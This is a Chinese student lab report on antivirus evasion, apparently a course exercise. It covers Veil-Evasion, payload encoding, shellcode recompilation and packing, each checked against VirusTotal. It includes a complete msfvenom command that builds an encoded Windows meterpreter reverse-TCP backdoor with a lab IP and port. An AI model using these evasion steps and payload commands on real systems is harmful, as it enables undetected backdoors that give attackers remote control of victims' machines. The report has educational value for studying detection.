實驗三免殺實踐趙文昊20155104

時間 2019-12-04

標籤實驗實踐简体版

原文原文鏈接

實驗三病毒免殺技術實踐

環境搭建

在作實驗以前試過好多方法在Kali中下載veil-evasion這款後門加殼的軟件，最後在度孃的幫助下終於裝上了，在這裏給你們提供一個比較有效的安裝方法（注：開發源加上中科大和阿里雲等等）shell

apt-get clean

apt-get update

apt-get upgrade -y

apt-get install veil-evasion

veil-evasion

在安裝Veil-evasion的過程當中可能會報錯，但只要安裝程序不退出就不要着急，有些錯誤是沒關係的。在跳出安裝界面的時候只須要不停地Next便可，界面也會出現不少亂碼的字符因此就不要嘗試讀懂了-_-||
過程時間很長，推薦你們提早準備好實驗軟件，方便跟上老師的腳步。編程

實驗要求和原理

這邊是本身上理論課的收穫，可能有錯……大概吧……
所謂免殺，就是避免殺毒軟件檢測出咱們傳送的帶病毒文件，而後，這個文件就能夠不那麼尷尬地被殺毒軟件馬上Kill掉，是提高實用性的關鍵一步（但願我不會用到他）。
大部分殺毒軟件是依賴特徵碼檢測，因此最簡單的免殺方式天然就是讓這些特徵碼隱藏起來，等到咱們執行它的時候，程序的原本面目再暴露出來。若是咱們只有可執行文件，那咱們須要給這個文件加殼。若是咱們有shellcode，咱們能夠用encode編碼或者payload從新編譯它。若是咱們有源碼，那就簡單不少，咱們直接用其餘語言重寫再編譯，不一樣編程語言所呈現的帶病毒文件差異會很是大，特徵碼也會消失，這樣也能夠達到目的。
我打算就用實驗二中那個後門軟件開刀，嘗試一下咱們製做的免殺是否有效果。
檢測方式就是咱們找到的兩個網站，從此有什麼不肯定的文件也能夠丟進去檢測一下，網站會給出一個比較可信的答覆。
https://www.virustotal.com/
http://www.virscan.org/
後面給你們展現效果。windows

實驗步驟

1 先用一下msfvenom編碼器

咱們先把上個實驗作出來的後門扔進檢測網站試一下。
很尷尬，這文件剛放進Windows，就被騰訊管家關小黑屋了。
從小黑屋放出來就能夠了，咱們分別放進兩個網站檢查一下，看起來殺毒軟件仍是比較厲害的（記住這幾個沒檢測出來的，之後仍是不用了）。
tcp

接下來，開始作免殺，讓咱們看一下效果怎麼樣。
編碼器，讓咱們多編幾回碼，結果天然是沒什麼變化的。。。編程語言

msfvenom -p windows/meterpreter/reverse_tcp -x ./20155104.exe -i 5 -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.43.74 LPORT=5104 -f exe > 20155104_backdoor.exe學習

2 試試Veil-evasion

Veil-evasion是一個免殺平臺，讓咱們試一下
我使用的版本是3.1.1，跟舊版本可能有一些不一樣的地方。
打開Veil-evasion，能夠查看已加載的payload，有41個！
選擇其中一個開始製做！我選的跟教程同樣是21號。選好後是這樣的！
網站

在這裏要設置一些信息，我把LocalHost設置成了本身的IP地址，而且把LocalPort設置成本身的學號。
阿里雲

最後給本身的程序起一個名字，而後完成，若是顯示這樣一個界面，咱們的成品大概就製做好了！
編碼

在這個界面下依然會顯示作好的文件路徑，必定要記得複製一下！否則一會會頭疼的。
好了，看一下，把東西拿出來，再放到網站上試一下。
3d

能夠看出來這個免殺是有那麼些效果的。。。（雖然仍是有很多能檢測出來）

4 shellcode再編譯，這個手工操做就有點費勁了

先生成一個c語言格式的shellcode

再編一個C語言編程的程序，簡單一點用到這段生成的字符串便可，不用想的那麼複雜。（因代碼具備攻擊性因此暫不顯示了，有興趣的本身摸索製做）

扔進網站，查得這樣的結果，比預想的還要更好一些哦！

5 加殼

這段操做起來比較簡單，須要咱們提早準備一個有病毒的可執行文件（這裏就決定是剛纔生成的那個文件啦！）

老規矩，扔進網站，檢查一下！

看得出來，這個效果不是很好，簡單的加殼並不能給免殺帶來太多的好處。

實驗感想

免殺這個實驗是提高實用性很關鍵的一堂課，這使咱們攻擊一個廣泛的正常使用的機器成爲了可能，雖然尚未達到沒法防護的地步，可是通過一些誘導後，廣泛的機器已經能夠被咱們入侵。可是，要想真正達到職業黑客的水平，這些仍是不夠的，咱們目前沒法讓這病毒自啓動，並將咱們的操做提高到一個管理員或者說是root權限上，還有不少須要學習的地方。殺毒軟件的運做機制是咱們考慮如何入侵的一個重要信息，咱們要充分了解殺軟才能避開檢測，矛和盾是相互促進，必須相互瞭解才能夠提升，這個實驗也同時告訴了咱們怎麼更有效地進行防護。